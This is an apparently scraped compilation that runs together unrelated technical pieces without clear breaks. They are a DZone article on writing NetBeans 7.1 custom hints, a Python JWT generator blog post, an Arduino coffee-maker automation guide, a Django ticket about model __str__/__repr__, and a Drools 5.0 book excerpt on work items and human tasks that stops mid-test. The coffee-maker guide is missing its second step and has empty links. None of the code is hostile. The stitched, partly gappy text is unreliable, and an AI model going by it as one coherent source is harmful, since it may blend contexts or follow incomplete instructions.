Creating a NetBeans 7.1 Custom Hint Join the DZone community and get the full member experience.Join For Free I have talked about some of my favorite NetBeans hints in the posts Seven NetBeans Hints for Modernizing Java Code and Seven Indispensable NetBeans Java Hints. The fourteen hints covered in those two posts are a small fraction of the total number of hints that NetBeans supports "out of the box." However, even greater flexibility is available to the NetBeans user because NetBeans 7.1 makes it possible to write custom hints. I look at a simple example of this in this post. Geertjan Wielenga's post Custom Declarative Hints in NetBeans IDE 7.1 begins with coverage of NetBeans's "Inspect and Transform" (AKA "Inspect and Refactor") dialog, which is available from the "Refactor" menu (which in turn is available via the dropdown "Refactor" menu along the menu bar or via right-click in the NetBeans editor). The following screen snapshot shows how this looks. The "Inspect" field of the "Inspect and Transform" dialog allows the NetBeans user to tailor which project or file should be inspected. The "Use" portion of the "Inspect and Transform" dialog allows that NetBeans user to specify which hints to inspect for. In this case, I am inspecting using custom hints and I can see that by clicking on the "Manage" button and selecting the "Custom" checkbox. Note that if "Custom" is not an option when you first bring this up, you probably need to click the "New" button in the bottom left corner. When I click on "Manage" and check the "Custom" box, it expands and I can see the newly created "Inspection" hint. If I click on this name, I can rename it and do so in this case. The renamed inspection ("CurrentDateDoesNotNeedSystemCurrentMillis") is shown in the next screen snapshot. To create the hint and provide the description seen in the box, I can click on the "Edit Script" button. Doing so leads to the small editor window shown in the next screen snapshot. 
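The script contents only appear in the screenshots, but a declarative hint of this kind is essentially a source pattern, a => rewrite, and a terminating ;;. The following is a rough sketch of such a rule in the NetBeans 7.1 declarative hints format; treat the exact syntax (especially the description header) as an approximation rather than a verified script:

```
<!description="java.util.Date's no-argument constructor already uses the current time">
new java.util.Date(java.lang.System.currentTimeMillis())
=> new java.util.Date()
;;
```

The pattern on the left matches the redundant construction, and the fragment after => is what NetBeans offers as the automatic fix.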
If more space is desired for editing the custom inspection/hint, the "Open in Editor" button will lead to the text being opened in the NetBeans text editor in which normal Java code and XML code is edited. With the custom inspection/hint in place, it's time to try it out on some Java code. The following code listing uses an extraneous call to System.currentTimeMillis() and passes its result to the java.util.Date single long argument constructor. This is unnecessary because Date's no-arguments constructor will automatically instantiate an instance of Date based on the current time (time now).

RedundantSystemCurrentTimeMillis.java

package dustin.examples;

import static java.lang.System.out;
import java.util.Date;

/**
 * Simple class to demonstrate NetBeans custom hint.
 *
 * @author Dustin
 */
public class RedundantSystemCurrentTimeMillis
{
   public static void main(final String[] arguments)
   {
      final Date date = new Date(System.currentTimeMillis());
      out.println(date);
   }
}

The above code works properly, but could be more concise. When I tell NetBeans to associate my new inspection with this project in the "Inspect and Transform" dialog, NetBeans is able to flag this for me and recommend the fix. The next three screen snapshots demonstrate that NetBeans will flag the warning with the yellow light bulb icon and yellow underlining, will recommend the fix when I click on the light bulb, and implements the suggested fix when I select it. As the above has shown, a simple custom hint allows NetBeans to identify, flag, and fix at my request the unnecessary uses of System.currentTimeMillis(). I've written before that NetBeans's hints are so handy because they do in fact do three things for the Java developer: automatically flag areas for code improvement for the developer, often automatically fix the issue if so desired, and communicate better ways of writing Java.
For the last benefit in this case, the existence of this custom hint helps convey to other Java developers a little more knowledge about the Date class and a better way to instantiate it when the current date/time is desired. Additional resources on custom hints include Geertjan Wielenga's posts (among them Oh No Vector! / Oh No Utilities.loadImage!) and Jan Lahoda's jackpot30 Rules Language (which covers the rules language syntax used by the custom inspections/hints and shown in the simple example above). The Refactoring with Inspect and Transform in the NetBeans IDE Java Editor tutorial also includes a section on managing custom hints. Hopefully, the addressing of Bug 210023 will help out with this situation. My example custom NetBeans hint works specifically with the Date class. An interesting and somewhat related StackOverflow thread asks if a NetBeans custom hint could be created to recommend use of Joda Time instead of Date or Calendar. A response on that thread refers to the NetBeans Java Hint Module Tutorial. Looking over that tutorial reminds me that the approach outlined in this post and available in NetBeans 7.1 is certainly improved and easier to use. Incidentally, a hint like that asked for in the referenced StackOverflow thread is easy to write in NetBeans 7.1. There is no transform in this example because a change from the Date class to a Joda Time class would likely require more changes in the code than the simple transform could handle. This hint therefore becomes one that simply recommends changing to Joda Time. The next screen snapshots show the simple hint and how it appears in the NetBeans editor. Each release of NetBeans seems to add more useful hints to the already large number of helpful hints that NetBeans supports. However, it is impossible for the NetBeans developers to add every hint that every team or project might want. Furthermore, it is not desirable to have every possible hint that every community member might come up with added to the IDE.
For this reason, the ability to specify custom hints in NetBeans and the ability to apply those hints selectively to projects and files are both highly desirable capabilities. Published at DZone with permission of Dustin Marx, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/creating-netbeans-71-custom
Write your own JWT generator in Python

I have written about JWTs before. If you are not familiar with them you might start by taking a look at my article on Understanding JWTs and also my piece on Python keywords, as I revisited JWTs there too. So, assuming you are familiar with those articles, I will dive straight into it.

The problem

I do a lot of generating JWTs on the command line and it was a pain specifying things like Application IDs, user names and ACLs on the command line. I wanted a simple file in my project directory where I could set the information once, and then use that file to generate JWTs as required. That's it! Here's what a sample file, .jwt, might look like for a typical project:

APP_ID="7ffb050a-121e-4a67-94b8-8301a7e4163d"
PRIVATE_KEY_FILE="private.key"

# 24 hrs
EXPIRY=86400

# For Client SDK tokens to authenticate users only
SUB=<username>
ACL='{"paths": {"/*/users/**": {},"/*/conversations/**": {},"/*/sessions/**": {},"/*/devices/**": {},"/*/image/**": {},"/*/media/**": {},"/*/applications/**": {},"/*/push/**": {},"/*/knocking/**": {}}}'

Generally it's the APP_ID that you need to keep copying and pasting on the command line, so that's first in the file. By convention I store my private key in private.key. The other entries are optional, but I usually set a long expiry for testing. If you don't set this the default of 15 minutes is used.

Env file format

The .jwt file is slightly special in that it is actually an environment file. Typically your environment file is .env. I don't use that name as many of my projects already have a .env and typically I want to keep the JWT info separate. The great thing about environment files is Python has a library that makes dealing with them really easy. You pull in the library with from dotenv import load_dotenv. You then use calls like os.getenv("PRIVATE_KEY_FILE") to fetch the environment variable values.

Claims

I talked before about optional "claims" that a JWT might have.
In the above example SUB and ACL are optional claims - they only make sense for me when testing Nexmo Client SDK apps. You could however happily add your own optional claims and they would be taken into account by the JWT generator automatically. The only exception to that is if a claim needed some additional processing or logic before being used; that would need to be added in the code. An example of this is ACLs. If you look at valid ACLs for working with the Nexmo Client SDK in jwt.io, you will see they are a JSON object. For this reason I have to convert this from a string in the .jwt file to a Python object with json.loads(). You then have a Python dictionary (print(type(payload['acl']))) and jwt.encode does the right thing. If your claims don't need special handling you can just add your claims to the .jwt file and away you go - check the code comment for the correct place to pass in your optional claims.

The code

Given what you already know about JWTs from my other articles you already have a head start in understanding the code.
So I will go "full monty" and display it here:

#!/usr/bin/env python3
import os
import jwt
import time
from uuid import uuid4
from dotenv import load_dotenv
import json

def read_file(filename):
    f = open(filename, mode='r', encoding='utf-8')
    source = f.read()
    f.close()
    return source

load_dotenv('.jwt')
app_id = os.getenv("APP_ID")
private_key_file = os.getenv("PRIVATE_KEY_FILE")
private_key = read_file(private_key_file)
exp = os.getenv("EXPIRY")
sub = os.getenv("SUB")
acl = os.getenv("ACL")

def build_payload(application_id, **kwargs):
    payload = {}
    payload['application_id'] = application_id
    payload['iat'] = int(time.time())
    payload['jti'] = str(uuid4())
    if "exp" in kwargs:
        exp = kwargs.pop('exp')
        if exp:
            payload['exp'] = int(time.time()) + int(exp)
        else:
            payload['exp'] = int(time.time()) + (15 * 60)  # default to 15 minutes
    for k in kwargs:
        if kwargs[k]:
            if k == 'acl':
                payload[k] = json.loads(kwargs[k])  # In jwt.io acl is a JSON object in the valid JWT.
            else:
                payload[k] = kwargs[k]
    return payload

payload = build_payload(app_id, exp=exp, sub=sub, acl=acl)  # Add optional custom claims as required
token = jwt.encode(payload, private_key, algorithm='RS256')
j = token.decode(encoding='ascii')  # Convert byte string to printable string
print(j)

Much of the code I have looked at in my previous articles, so it should be fairly self-explanatory with the comments. Note that when printing out the JWT it's actually a byte string after encoding, so you need to decode that for the real world using str.decode(). I use the ASCII encoding because ASCII chars should cover the range of chars in a JWT, as base64url encoded data is a string of characters that only contains a-z, A-Z, 0-9, - and _.

Usage

You can add the generator to your path. You can then run it in your project directory to generate JWTs based on the .jwt file in that project directory.
If you require a custom version of the generator for a project you can just copy the program file to that project directory, customize the code, and run there. It's open source (MIT license) so you can do what you want with it. You can also generate JWTs from a shell script, and potentially set an environment variable to contain the JWT. This can make testing quite convenient.

Things to do with the code

- Create a web version!
- Customize it to handle your own optional claims.

GitHub repo

The code is also available in my GitHub repo. I'm not completely happy with the code as it is, although things have been working quite nicely, so I expect the code in the repo will be improved when I get time.
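One trick that pairs well with the generator: because a JWT's payload is just base64url-encoded JSON, you can inspect a generated token with nothing but the standard library. The peek_claims helper below is my own illustrative addition, not part of the generator; it deliberately does not verify the signature, so use it only for debugging.

```python
import base64
import json

def peek_claims(token):
    """Decode the payload segment of a JWT WITHOUT verifying the signature."""
    payload_b64 = token.split('.')[1]
    # base64url decoding needs the '=' padding that JWTs strip off.
    payload_b64 += '=' * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Example: feed it a generated token to confirm the claims landed.
# claims = peek_claims(generated_token)
# print(claims['application_id'], claims.get('sub'), claims.get('acl'))
```

Feed it the printed token and you get back the claims dictionary, which makes it easy to confirm that EXPIRY, SUB and ACL from the .jwt file actually made it into the payload.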
https://tonys-notebook.com/articles/jwt-generator.html
How to Make an Auto-brewing Coffee Maker

Intro: For those mornings where you just need that coffee to be ready when you wake up, your Arduino coffee maker will come to the rescue! This can be done with most coffee makers, but the one I used was a Keurig B-40; the steps should be essentially the same for different brewers.

Materials:
- A coffee maker (preferably a cheap one)
- Arduino (I used an Uno)
- Wire
- 2 relays (or 1, if you only need to turn on the coffee maker for it to brew)
- Clock module (DS1302 works fine)
- 5V power supply (I used an old phone charger)
- Soldering iron
- Hot glue gun (or other strong adhesive)

Step 1: Set Up Connections

The first step is to disassemble your brewer. MAKE SURE IT IS UNPLUGGED!!! Your goal is to find the board or switch(es) that allow you to brew the coffee. For my Keurig, this was the panel on top. I used this () video to help me disassemble it. It sure wasn't easy. In general it should only involve a few screws. When you have the board or switch, you do not have to remove any components. Simply solder wires to either side of the button or switch you'd be using. I only needed two, for the power and 8oz brew buttons. Once these connections are soldered, you are ready to start putting things together.
This means if I plug in the coffee maker, I get power to the brewer like normal, but I also get the 5V as if the supply was connected to the wall. The cables leading away from this can be connected to any GND connection and the Vin pin of the Arduino. You now have power.

Before actually connecting to the Arduino, I recommend setting the clock with the steps below. To set the clock, you'll need to download an additional library for Arduino available here:... Import that into your Arduino libraries, then upload this code onto the device:

#include <virtuabotixRTC.h>

// Creation of the Real Time Clock Object
// SCLK -> 6, I/O -> 7, CE -> 8
virtuabotixRTC myRTC(6, 7, 8);

void setup() {
  myRTC.setDS1302Time(00, [minutes], [Hour in 24h], [Day of week (Sunday is 1)], [Month], [Day], [Year]);
}

void loop() {
  ;
}

Almost done! Now all you have to do is upload the attached code and connect it all. Be sure to edit the brew times in the code, seen before the void setup(). If set to zero, the brewer will not brew on this day.

As for the connections, for my Arduino and brewer I had of course the Vcc on the clock and the Vcc on both relays connected to 5V, the GND on the clock and the relays connected to Arduino GND, and the positive and negative terminals of the power adapter connected to Vin and GND respectively.

As for outputs (specific to the Keurig B40! Other brewers will be different): one relay should have the positive sides of pwr and 8oz brew connected to the middle, and the negative sides of both connected to either side. Power I had connected to the "Always on" side. The IN pin should be connected to pin 4 on the Arduino if using the provided sketch. The other relay should have the switch connected to the middle and always-on side; orientation is not overly important, as the relay is a mechanical device and doesn't conduct any of the voltage. The IN pin should be connected to pin 2 on the Arduino if using the provided sketch.
The clock is simple: it should be connected to pins 6, 7, and 8, as explained in the comments of the sketch.

Step 3: Makin' Coffeh! :D

At this point, if all has been set up correctly, a test run is in order. Plugging in the brewer should also power the Arduino board, which should cause the lights on the relays (provided they have them) to turn on, and you should definitely see the green light on the Arduino light up. If all goes well, feel free to hot glue the relays, the clock, the Arduino, and the power supply to the coffee maker, where you see fit. You now have a self-brewing coffee maker, assuming you have coffee in the brewer at all times, and there is water in it.

Smart idea! Thanks for sharing :)

Great idea!
Opened 11 years ago
Closed 11 years ago
Last modified 10 years ago

#1055 closed defect (fixed)

Models should have better default __str__() and __repr__() methods

Description

Right now, the default __repr__() method as defined in the Model class (in django/core/meta/__init__.py) looks like:

def __repr__(self):
    return '<%s object>' % self.__class__.__name__

I think we should have at least a __str__() definition and a better __repr__(), which includes at least the object id, so that when using the interactive interpreter, you can tell one object from another. Something like:

def __str__(self):
    return '%s %s' % (self.__class__.__name__, self.id)

def __repr__(self):
    return '<%s object ID=%s>' % (self.__class__.__name__, self.id)

Change History (3)

comment:1 Changed 11 years ago by

comment:2 Changed 11 years ago by

The annoying thing about <>-enclosed Python-style repr strings is that when inserting them in templates for debugging, you must remember to escape them to actually see them on the page.

comment:3 Changed 11 years ago by

This was fixed a while back.
Drools JBoss Rules 5.0 Developer's Guide

Develop rules-based business logic using the Drools platform.

Transfer Funds work item

We'll now jump almost to the end of our process. After a loan is approved, we need a way of transferring the specified sum of money to the customer's account. This can be done with rules, or even better, with pure Java, as this task is procedural in nature. We'll create a custom work item so that we can easily reuse this functionality in other ruleflows. Note that if it were a one-off task, it would probably be better suited to an action node. The Transfer Funds node in the loan approval process is a custom work item. A new custom work item can be defined using the following four steps (we'll see how they are accomplished later on):

- Create a work item definition. This will be used by the Eclipse ruleflow editor and by the ruleflow engine to set and get parameters. For example, the default WorkDefinitions.conf file that comes with Drools describes an 'Email' work definition. The configuration is written in MVEL. MVEL allows one to construct complex object graphs in a very concise format. This file contains a list of maps—List<Map<String, Object>>. Each map defines the properties of one work definition. The properties are: name, parameters (that this work item works with), displayName, icon, and customEditor (these last three are used when displaying the work item in the Eclipse ruleflow editor). A custom editor is opened after double-clicking on the ruleflow node.

Code listing 13: Excerpt from the default WorkDefinitions.conf file.

A work item's parameters property is a map of parameter names to value wrappers. The value wrapper must implement the org.drools.process.core.datatype.DataType interface.

- Register the work definitions with the knowledge base configuration. This will be shown in the next section.
- Create a work item handler. This handler represents the actual behavior of a work item.
It will be invoked whenever the ruleflow execution reaches this work item node. All of the handlers must implement the org.drools.runtime.process.WorkItemHandler interface. It defines two methods: one for executing the work item and another for aborting the work item. Drools comes with some default work item handler implementations, for example, a handler for sending emails: org.drools.process.workitem.email.EmailWorkItemHandler. This handler needs a working SMTP server. It must be set through the setConnection method before registering the work item handler with the work item manager (next step). Another default work item handler was shown in code listing 2 (in the first part): SystemOutWorkItemHandler.

- Register the work item handler with the work item manager.

After reading this you may ask: why doesn't the work item definition also specify the handler? It is because a work item can have one or more work item handlers that can be used interchangeably. For example, in a test case, we may want to use a different work item handler than in the production environment. We'll now follow this four-step process and create a Transfer Funds custom work item.

Work item definition

Our transfer funds work item will have three input parameters: source account, destination account, and the amount to transfer. Its definition is as follows:

import org.drools.process.core.datatype.impl.type.ObjectDataType;
[
  [
    "name" : "Transfer Funds",
    "parameters" : [
      "Source Account" : new ObjectDataType("droolsbook.bank.model.Account"),
      "Destination Account" : new ObjectDataType("droolsbook.bank.model.Account"),
      "Amount" : new ObjectDataType("java.math.BigDecimal")
    ],
    "displayName" : "Transfer Funds",
    "icon" : "icons/transfer.gif"
  ]
]

Code listing 14: Work item definition from the BankingWorkDefinitions.conf file.

The Transfer Funds work item definition from the code above declares the usual properties. It doesn't have a custom editor, as was the case with the email work item.
All of the parameters are of the ObjectDataType type. This is a wrapper that can wrap any type. In our case, we are wrapping the Account and BigDecimal types. We've also specified an icon that will be displayed in the ruleflow's editor palette and in the ruleflow itself. The icon should be of the size 16x16 pixels.

Work item registration

First make sure that the BankingWorkDefinitions.conf file is on your classpath. We now have to tell Drools about our new work item. This can be done by creating a drools.rulebase.conf file with the following contents:

drools.workDefinitions = WorkDefinitions.conf BankingWorkDefinitions.conf

Code listing 15: Work definitions registration in the drools.rulebase.conf file (all in one line).

When Drools starts up, it scans the classpath for configuration files. Configuration specified in the drools.rulebase.conf file will override the default configuration. In this case, only the drools.workDefinitions setting is being overridden. We already know that the WorkDefinitions.conf file contains the default work items such as email and log. We want to keep those and just add ours. As can be seen from the code listing above, the drools.workDefinitions setting accepts a list of configurations. They must be separated by a space. When we now open the ruleflow editor in Eclipse, the ruleflow palette should contain our new Transfer Funds work item. If you want to know more about the file-based configuration resolution process, you can look into the org.drools.util.ChainedProperties class.

Work item handler

Next, we'll implement the work item handler. It must implement the org.drools.runtime.process.WorkItemHandler interface that defines two methods: executeWorkItem and abortWorkItem.
The implementation is as follows:

/**
 * Work item handler responsible for transferring an amount from
 * one account to another using the bankingService.transfer method.
 * Input parameters: 'Source Account', 'Destination Account',
 * and 'Amount'.
 */
public class TransferWorkItemHandler implements WorkItemHandler {

    BankingService bankingService;

    public void executeWorkItem(WorkItem workItem,
            WorkItemManager manager) {
        Account sourceAccount = (Account) workItem
            .getParameter("Source Account");
        Account destinationAccount = (Account) workItem
            .getParameter("Destination Account");
        BigDecimal sum = (BigDecimal) workItem
            .getParameter("Amount");
        try {
            bankingService.transfer(sourceAccount,
                destinationAccount, sum);
            manager.completeWorkItem(workItem.getId(), null);
        } catch (Exception e) {
            e.printStackTrace();
            manager.abortWorkItem(workItem.getId());
        }
    }

    /**
     * Does nothing, as this work item cannot be aborted.
     */
    public void abortWorkItem(WorkItem workItem,
            WorkItemManager manager) {
    }
}

Code listing 16: Work item handler (TransferWorkItemHandler.java file).

The executeWorkItem method retrieves the three declared parameters and calls the bankingService.transfer method (the implementation of this method won't be shown). If all went OK, the manager is notified that this work item has been completed. It needs the ID of the work item and, optionally, a result parameter map. In our case, it is set to null. If an exception happens during the transfer, the manager is told to abort this work item. The abortWorkItem method on our handler doesn't do anything, because this work item cannot be aborted. Please note that the work item handler must be thread-safe. Many ruleflow instances may reuse the same work item handler instance.
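In practice, that thread-safety requirement usually comes down to keeping no mutable state in the handler: everything a request touches should live in local variables. The sketch below illustrates the idea using simplified stand-in interfaces (these are not the real Drools types; the names are made up for this example):

```java
import java.util.HashMap;
import java.util.Map;

// Simplified stand-ins for the Drools work item types, for illustration only.
interface WorkItem {
    long getId();
    Object getParameter(String name);
}

interface WorkItemManager {
    void completeWorkItem(long id, Map<String, Object> results);
}

// Thread-safe: the handler has no mutable fields, so many ruleflow
// instances can call executeWorkItem concurrently on one shared instance.
class EchoWorkItemHandler {
    public void executeWorkItem(WorkItem workItem, WorkItemManager manager) {
        Object amount = workItem.getParameter("Amount"); // local per call
        Map<String, Object> results = new HashMap<>();
        results.put("Echo", amount);
        manager.completeWorkItem(workItem.getId(), results);
    }
}

public class HandlerDemo {
    public static void main(String[] args) {
        WorkItem item = new WorkItem() {
            public long getId() { return 42L; }
            public Object getParameter(String name) {
                return "Amount".equals(name) ? 100 : null;
            }
        };
        // The manager callback just prints what the handler produced.
        new EchoWorkItemHandler().executeWorkItem(item,
            (id, results) -> System.out.println(id + " -> " + results));
    }
}
```

A handler that instead stored the "current" work item in a field would corrupt state as soon as two process instances reached the node at the same time.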
Work item handler registration

The transfer work item handler can be registered with a WorkItemManager as follows:

TransferWorkItemHandler transferHandler =
    new TransferWorkItemHandler();
transferHandler.setBankingService(bankingService);
session.getWorkItemManager().registerWorkItemHandler(
    "Transfer Funds", transferHandler);

Code listing 17: TransferWorkItemHandler registration (DefaultLoanApprovalServiceTest.java file).

A new instance of this handler is created and the banking service is set. Then it is registered with the WorkItemManager in a session. Next, we need to 'connect' this work item into our ruleflow, which means setting its parameters once it is executed. We need to set the source/destination account and the amount to be transferred. We'll use the in-parameter mappings of Transfer Funds to set these parameters. The Source Account parameter is mapped to the loanSourceAccount ruleflow variable, the Destination Account parameter is set to the destination account of the loan, and the Amount parameter is set to the loan amount.

Testing the transfer work item

This test will verify that the Transfer Funds work item is correctly executed with all of the parameters set, and that it calls the bankingService.transfer method with the correct parameters. For this test, the bankingService service will be mocked with the jMock library (jMock is a lightweight mock object library for Java). First, we need to set up the banking service mock object in the following manner:

mockery = new JUnit4Mockery();
bankingService = mockery.mock(BankingService.class);

Code listing 18: jMock setup of the bankingService mock object (DefaultLoanApprovalServiceTest.java file).

Next, we can write our test. We are expecting one invocation of the transfer method with loanSourceAccount and the loan's destination and amount properties.
Then the test will set up the transfer work item as in code listing 17, start the process, and approve the loan (more about this is discussed in the next section). The test also verifies that the Transfer Funds node has been executed. The test method's implementation is as follows:

@Test
public void transferFunds() {
    mockery.checking(new Expectations() {
        {
            one(bankingService).transfer(loanSourceAccount,
                loan.getDestinationAccount(), loan.getAmount());
        }
    });
    setUpTransferWorkItem();
    setUpLowAmount();
    startProcess();
    approveLoan();
    assertTrue(trackingProcessEventListener.isNodeTriggered(
        PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER));
}

Code listing 19: Test for the Transfer Funds work item (DefaultLoanApprovalServiceTest.java file).

The test should execute successfully.

Human task

Let's go back to the loan approval ruleflow. We've finished after the Rating? node. Our next step is to implement the Process Loan node. This is where the human actors will be involved. We've done what we could with our automated process; now is the time for tasks that a computer can't, or shouldn't, do. Drools supports human tasks through the Web Services Human Task specification (WS-HumanTask is an OASIS specification). With this specification, we can define human tasks that will be automatically created when the ruleflow reaches this ruleflow node. After they are created, they will appear on the 'task list screen' of designated users, who can 'claim' these tasks and start working on them until they are completed. They can also suspend or abort these tasks. Once the task reaches a final state (complete/abort), the ruleflow continues execution. Please note that this is a simplified view; the WS-HumanTask specification defines a more complex life cycle of a task. From the ruleflow perspective, WS-HumanTask is just a special case of a work item. Once it is triggered, the ruleflow simply waits for the end result, be it success or failure.
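The simplified life cycle just described — a task starts out ready, a user claims it (becoming its owner), starts working on it, and finally completes it — can be made concrete with a toy state machine. This sketch covers only a small subset of the WS-HumanTask states and is not the Drools implementation; all names here are made up for illustration:

```java
// A small subset of the WS-HumanTask task states.
enum TaskStatus { READY, RESERVED, IN_PROGRESS, COMPLETED }

class MiniTask {
    private TaskStatus status = TaskStatus.READY;
    private String owner;

    void claim(String userId) {
        require(TaskStatus.READY);
        owner = userId;                  // the claiming user becomes the owner
        status = TaskStatus.RESERVED;
    }

    void start(String userId) {
        require(TaskStatus.RESERVED);
        checkOwner(userId);
        status = TaskStatus.IN_PROGRESS;
    }

    void complete(String userId) {
        require(TaskStatus.IN_PROGRESS);
        checkOwner(userId);
        status = TaskStatus.COMPLETED;   // the waiting ruleflow may now continue
    }

    TaskStatus getStatus() { return status; }

    private void require(TaskStatus expected) {
        if (status != expected)
            throw new IllegalStateException(
                "expected " + expected + " but was " + status);
    }

    private void checkOwner(String userId) {
        if (!userId.equals(owner))
            throw new IllegalStateException(userId + " is not the owner");
    }
}

public class TaskLifecycleDemo {
    public static void main(String[] args) {
        MiniTask task = new MiniTask();
        task.claim("123");
        task.start("123");
        task.complete("123");
        System.out.println(task.getStatus()); // COMPLETED
    }
}
```

The point of the state checks is that operations are only valid in order: a task that was never claimed cannot be started, and only its owner can complete it.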
Drools comes with a simple work item handler implementation for human tasks called WSHumanTaskHandler. It is far from implementing all of the features of the WS-HumanTask specification, but it gives us a starting point and a direction. Human task support is part of the drools-process-task module. The human task ruleflow node allows us to specify actorId, which is the ID of a person/group that will have the role of potentialOwner as defined by WS-HumanTask. Also, a comment can be specified, which will become the 'subject' and 'description' of a human task. A priority, and whether the task can be skipped, can also be defined. The WSHumanTaskHandler provides no support for some WS-HumanTask user roles such as task initiators, excluded owners, task stakeholders, business administrators, or recipients. Nor does it support attachments, multiple comments, task delegations, start/end deadlines with their escalations, notifications, or user reassignments. If needed, the WSHumanTaskHandler can be extended to provide the features we need. For the purpose of our loan approval example, we'll use WSHumanTaskHandler unchanged.

The core part of the WS-HumanTask specification is the server that receives the tasks and manages them. WSHumanTaskHandler is kept lightweight. It is a simple client that creates a task based on the properties set in the ruleflow and registers this task with the server together with a callback. As has been said earlier, it then waits for the success or failure of the task. It can take some time for a human task to finish; therefore, a more advanced implementation could, for example, persist the ruleflow to some permanent storage in order to free up resources. On the other side, the server is a more or less complete implementation of the WS-HumanTask specification. It goes even further by giving us the ability to send standard iCalendar VEVENT notifications (iCalendar is an RFC 2445 standard for calendar exchange.
More information about iCalendar VEVENTs can be found online.)

Test for the human task

So far it was only theory—a test will hopefully make it clearer. In order to write some tests for the Process Loan human task, we'll need a server that will receive these tasks. Other clients will then connect to this server and work on these tasks, and when they are completed, our ruleflow will be able to continue. Due to its size, the test will be divided into three parts—server setup, client setup, and the client 'working on the task'. We'll start with the server setup (see the following code listing). It will initialize the server, register a human task work item handler, and start the loan approval process.

@Test
public void processLoan() throws Exception {
    EntityManagerFactory emf = Persistence
        .createEntityManagerFactory("org.drools.task");
    TaskService taskService = new TaskService(emf,
        SystemEventListenerFactory.getSystemEventListener());
    MockUserInfo userInfo = new MockUserInfo();
    taskService.setUserinfo(userInfo);
    TaskServiceSession taskSession = taskService
        .createSession();
    taskSession.addUser(new User("Administrator"));
    taskSession.addUser(new User("123"));
    taskSession.addUser(new User("456"));
    taskSession.addUser(new User("789"));
    MinaTaskServer server = new MinaTaskServer(taskService);
    Thread thread = new Thread(server);
    thread.start();
    Thread.sleep(500);
    WorkItemHandler htHandler = new WSHumanTaskHandler();
    session.getWorkItemManager().registerWorkItemHandler(
        "Human Task", htHandler);
    setUpLowAmount();
    startProcess();

Code listing 20: Test for the Process Loan node—setup of the server and process start-up (DefaultLoanApprovalServiceTest.java file).

As part of the server setup, the test creates a JPA EntityManagerFactory (JPA stands for Java Persistence API) from a persistence unit named org.drools.task (the configuration for this persistence unit is inside the drools-process-task.jar module in /META-INF/persistence.xml.
By default, it uses an in-memory database). It is used for persisting human tasks that are not currently needed. There may be thousands of human task instances running concurrently, and each can take minutes, hours, days, or even months to finish. Persisting them will save us resources. Next, a TaskService is created. It takes an EntityManagerFactory and a SystemEventListener.

org.drools.SystemEventListener

The SystemEventListener provides callback-style logging of various Drools system events. The listener can be set through SystemEventListenerFactory. The default listener prints everything to the console.

TaskService represents the main server process. A UserInfo object is set on taskService. It has methods for retrieving various information about users and groups of users in our organization that taskService needs (it is, for example, used when sending the iCalendar notifications). For testing purposes, we're using only a mock implementation—MockUserInfo. TaskService can be accessed by multiple threads. Next, TaskServiceSession represents one session of this service. This session can be accessed by only one thread at a time. We use this session to create some test users. Our Process Loan task is initially assigned to actorIds 123, 456, and 789. This is defined in the Process Loan ruleflow node's properties. Next, the server thread is started, wrapped in a MinaTaskServer. It is a lightweight server implementation that listens on a port for client requests. It is based on Apache MINA. The current thread then sleeps for 500 ms, so that the server thread has some time to initialize. Then a default Drools WSHumanTaskHandler is registered, a new loan application with a low amount is created, and the ruleflow is started. The ruleflow will execute all the way down to the Process Loan human task, where the WSHumanTaskHandler takes over.
It creates a task from the information specified in the Process Loan node and registers this task with the server. It knows how to connect to the server. The ruleflow then waits for the completion of this task. The next part of this test represents a client (a bank employee) that is viewing his/her task list and getting one task. First, the client must connect to the server. Because all of the communication between the client and the server is asynchronous, and we want to test it in one test method, we will use some blocking response handlers that simply block until the response is available. These response handlers are from the drools-process-task module. Next, the client.getTasksAssignedAsPotentialOwner method is called, and we wait for a list of tasks that the client can start working on. The test verifies that the list contains one task and that the status of this task is Ready.

MinaTaskClient client = new MinaTaskClient("client 1",
    new TaskClientHandler(
        SystemEventListenerFactory.getSystemEventListener()));
NioSocketConnector connector = new NioSocketConnector();
SocketAddress address = new InetSocketAddress("127.0.0.1", 9123);
client.connect(connector, address);

BlockingTaskSummaryResponseHandler summaryHandler =
    new BlockingTaskSummaryResponseHandler();
client.getTasksAssignedAsPotentialOwner("123", "en-UK",
    summaryHandler);
List<TaskSummary> tasks = summaryHandler.getResults();
assertEquals(1, tasks.size());
TaskSummary task = tasks.get(0);
assertEquals("Process Loan", task.getName());
assertEquals(3, task.getPriority());
assertEquals(Status.Ready, task.getStatus());

Code listing 21: Test for the Process Loan node—setup of a client and task list retrieval (DefaultLoanApprovalServiceTest.java file).

The final part of this test represents a client (a bank employee) that 'claims' one of the tasks from the task list, then 'starts' this task, and finally 'completes' this task.
BlockingTaskOperationResponseHandler operationHandler =
    new BlockingTaskOperationResponseHandler();
client.claim(task.getId(), "123", operationHandler);
operationHandler.waitTillDone(10000);

operationHandler = new BlockingTaskOperationResponseHandler();
client.start(task.getId(), "123", operationHandler);
operationHandler.waitTillDone(10000);

operationHandler = new BlockingTaskOperationResponseHandler();
client.complete(task.getId(), "123", null, operationHandler);
operationHandler.waitTillDone(10000);

    assertTrue(trackingProcessEventListener.isNodeTriggered(
        PROCESS_LOAN_APPROVAL, NODE_JOIN_PROCESS_LOAN));
}

Code listing 22: Test for the Process Loan node—the client claiming, starting, and completing a task (DefaultLoanApprovalServiceTest.java file).

After the task is completed, the test verifies that the ruleflow continues execution through the next join node.

Final Approval

As you may imagine, before any money is paid out to the loan requester, a final check is needed from a supervisor. This is represented in the ruleflow by the Approve Event node. It is an event node from the ruleflow palette. It allows a process to respond to external events. This node has no incoming connections; in fact, events can be created/signaled through the process instance's signalEvent method. The method needs the event type and the event value itself. Parameters of the Event node include the event type and the name of the variable that holds this event. The variable must itself be declared as a ruleflow variable.

Test for the 'Approve Event' node

A test will show us how all this works. We'll set up a valid loan request. The dummy SystemOutWorkItemHandler will be used to get through the Transfer Funds and Process Loan work items. The execution should then wait for the approve event. Then we'll signal the event using the processInstance.signalEvent("LoanApprovedEvent", null) method and verify that the ruleflow finished successfully.
@Test
public void approveEventJoin() {
    setUpLowAmount();
    startProcess();
    assertEquals(ProcessInstance.STATE_ACTIVE,
        processInstance.getState());
    assertFalse(trackingProcessEventListener.isNodeTriggered(
        PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER));
    approveLoan();
    assertTrue(trackingProcessEventListener.isNodeTriggered(
        PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER));
